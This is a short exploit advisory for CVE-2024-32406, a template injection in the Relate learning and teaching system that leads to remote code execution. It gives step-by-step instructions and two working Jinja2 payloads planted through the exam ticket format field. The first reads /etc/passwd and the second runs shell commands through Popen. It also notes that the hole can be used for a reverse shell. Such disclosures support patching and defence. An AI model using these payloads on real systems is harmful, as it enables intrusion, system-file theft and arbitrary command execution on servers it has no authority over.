# Exploit Title: Relate Learning And Teaching system Version before 2024.1 SSTI(Markup Sandbox function) lead to RCE # Date: 22/04/2024 # Exploit Author: kai6u # Vendor Homepage: https://github.com/inducer/ # Software Link: https://github.com/inducer/relate # Version: before 2024.1 (https://github.com/inducer/relate/commit/2fdbd4480a2d0a45c746639be244a61a0d4112b6) # Tested on: Ubuntu 22.04 # CVE : CVE-2024-32406(Reserved) * SSTI is in the Batch-Issue Exam Tickets feature, which allows user to specify the format in which tickets are distributed and uses a Django (Jinja2) template internally. 1) First, the attacker uses the Ticket Format feature to plant the following payload. * Payload: * {{ 'abc'.__class__.__base__.__subclasses__()[111].__subclasses__()[0].__subclasses__()[0]('/etc/passwd').read() }} * Note that the subclasses index number in the payload depends on the python version, so it must be changed depending on the environment. 2) Click an Issue Ticket including the above payload. * Then you will see that the contents of the /etc/passwd file are output at the after Ticket Code block. 3) Next, the attacker modifies the above payload to execute arbitrary commands by changing the subclasses index number to the number of popen. * Payload: * {{ 'abc'.__class__.__base__.__subclasses__()[210]('whoami',shell=True,stdout=-1).communicate()[0].strip() }} 4) Click an Issue Ticket including the above payload. * If you check the results, you will see that ubuntu is displayed, which is the result of executing the whoami command. * An attacker can use this feature to execute reverse shell.
References:
https://book.hacktricks.xyz/v/jp/pentesting-web/ssti-server-side-template-injection